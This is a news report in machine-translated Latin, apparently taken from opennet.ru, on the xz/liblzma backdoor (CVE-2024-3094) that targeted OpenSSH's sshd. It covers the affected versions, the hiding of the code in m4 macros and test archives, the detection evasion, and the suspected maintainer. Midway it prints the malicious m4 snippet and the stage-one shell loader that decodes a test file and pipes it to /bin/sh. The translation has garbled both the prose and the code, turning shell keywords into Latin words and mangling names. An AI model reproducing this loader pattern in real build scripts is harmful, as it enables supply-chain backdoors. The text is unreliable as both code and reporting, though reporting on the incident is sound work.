Posticum in bibliotheca xz/liblzma repertum est quod ingressum per sshd . permittit

In sarcina XZ Utils, quae liblzma bibliothecae et utilitates comprehendit ad operandum data in forma compressa ".xz", posticum (CVE-2024-3094) notum est quod permittit interceptionem et modificationem notitiarum processuum per applicationes adiunctas. cum liblzma bibliotheca. Scopus principalis posticii est servo OpenSSH, qui in quibusdam distributionibus cum bibliotheca libsystemd conglutinatus est, qui vicissim liblzma utitur. Vinculum sshd cum bibliotheca vulnerabili permittit oppugnatores ut aditus ad SSH server sine authenticas.

Posticum adfuit in emissione officialium 5.6.0 et 5.6.1, die 24 februarii et die 9 Martii edito, quae in aliquas distributiones et repositoria acquirere potuit, exempli gratia: Gentoo, Arch Linux, Debian sid/constans, Fedora Rawhide et 40-beta, officinas openSUSe et collabitur, LibreELEC, Alpina ora, Solus, NixOS instabilis, OpenIndiana, OpenMandriva volubilis, pkgsrc vena, remissio vena, Manjaro tentatio. Omnes utentes xz 5.6.0 et 5.6.1 emissiones commendantur ut instanter ad versionem 5.4.6 revolvant.

Inter factores problema mitigantes, notari potest versionem liblzma cum postico non procurare ut emissio magnarum distributionum stabilium fiat, sed openSUSE Tumbleweed et Fedora 40-beta affecta. Arch Linux et Gentoo versionem vulnerabilem zx adhibent, sed impetum non susceptbilem quia systemd-notificatorium ad openssh non applicant, quae causa sshd coniungendi cum liblzma causat. Posticum tantum systemata x86_64 afficit in nucleo Linux et in bibliotheca Glibc C innixa.

Codicis posticium activum in m4 macros ab structo-ad-host.m4 latebat.m3 fasciculi usus est instrumenti automachi cum aedificaretur. In conventu, in executione perplexarum operationum obfuscatarum ex archivis (mala-2-corrupt_lzma4.xz, good-large_compressed.lzma), ad probandam rectitudinem operationis, generatum est objectum fasciculi cum malitioso codice, quod inclusum erat. the liblzma library and changed the operation logica quaedam of its functions. Macrae mXNUMX quae posticum excitant in tarballis emissione comprehensae sunt, sed in reposito Git non erant. Eodem tempore malitiosorum examinis aderant in reposito archivi, i.e. homo qui posticum implevit accessum habuit ad processuum generationis et repositorium et remissionem.

Cum liblzma in applicationibus utens, malitiosas mutationes datas intercipere vel mutare vel operationi sshd afficere poterant. Praesertim in maligno codice munus RSA_public_decryptae convolavit ut processus authenticas sshd praeteriret. Posticum praesidium ab detectione inclusum est et se non manifestavit cum variabiles ambitus LANG et TERM (i.e. processus in terminalis currit) et LD_DEBUG et LD_PROFILE ambitus variabiles non sunt positae, et etiam reducitur solum cum exsecutioni mandatur. /usr/sbin/sshd file exsecutabile. Posticum etiam instrumentum habuit in gyris lusione deprehensio executionis.

Praesertim fasciculi usus gl_am_configmake=`grep -aErls m4/ad-host.m4 "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev / null` ... gl_[$1]_config='sed \Β»r\n\Β»$gl_am_configmake | coaevus $gl_path_map | $gl_[$1]_praefix -d 2>/dev/nullus'

In prima constructione, grex operatio invenit tabellam probat/limas/mala-3-corrupt_lzma2.xz, quae, cum pacto, scripturam generavit: #### Salve #####345U211267$^D330^W [ ! $(uname) = "Linux" ] && exit 0 [ ! $(uname) = "Linux" ] && exit 0 [ ! $(uname) = "Linux" ] && exit 0 [ ! $(uname) = "Linux" ] && exit 0 [ ! $(uname) = "Linux" ] && exit 0 coaevus `grep ^srcdir= config.status` si test -f ../../config.status;tunc eval `grep ^srcdir= ../../config .status` srcdir="../../$srcdirΒ» fi export i=Β»((head -c +1024 >/dev/null) && caput -c +2048 && (head -c +1024 >/dev/ && caput -c +2048 && (head -c +1024 >/dev/null) && caput -c +2048 && (head -c c +1024 >/dev/null) && caput -c +2048 && (head -c + 1024 >/dev/null) && caput -c +2048 && c +1024 && (caput -c +2048 >/dev/null) && caput -c +1024 && (caput -c +2048 >/dev/null) && caput -c +1024 && (head -c +2048 >/ dev/null && caput -c +1024 && (head -c +2048 >/dev/null) && caput -c +1024 && (caput -c +2048 >/dev/null) && caput -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && caput -c +2048 && caput -c +1024 && (head -c +2048 >/dev/null) && caput -c +1024 && (caput -c +2048 >/dev/null) && caput -c +1024)(xz -dc $srcdir/tests/files/bono-large_compressed.lzma|eval$i|tail -c +2048|tr "\1024-\2048\1024-\939\31233-\114\321-\322\377-\35 \47-\14""\34-\0")|xz -F rudis -lzma13 -dc|/bin/sh #### Mundus ####

Quomodo oppugnatores accessum ad infrastructuram xz propositi nondum plene declararunt. Nondum etiam patet quot utentes et inceptis ob posticum decipiantur. Assertus auctor posticium (JiaT75 - Jia Tan), qui in repositorio malitioso archivo cum codice missae, cum tincidunt Fedora responderet et petitiones trahere misit Debianum ad translationem distributionum ad ramum xz 5.6.0 pertinentium, et non fecit Suspiciosa, cum particeps xz progressionem biennio ante factam et secundae elit secundum numerum mutationum factarum est. Praeter propositi xz, auctor posticii assertus etiam in evolutione fasciculorum xz-java et xz-insitati particeps fuit. Praeterea, Jia Tan ante paucos dies inclusa est in numero assertorum XZ Project embedded in nucleo Linux adhibito.

Mutatio malitiosa inventa est post solutionem nimiam CPU consumptionis et errorum ex valgrin generatorum cum via ssh ad systemata Debian sid-substructio coniungens. Notabile est solutionem inclusam mutationes xz 5.6.1 paratas ab asserto auctoris postici responsionibus querelis de tarditatibus et ruinis quae post upgradationem ad zx 5.6.0 versionem cum postico ortae sunt. Accedit anno praeterito Jia Tan mutationes factae repugnantes cum "-fsanitize=inscriptionis" inspectionis modum, causando ut in experimento fuzz debilitari possit.

Source: opennet.ru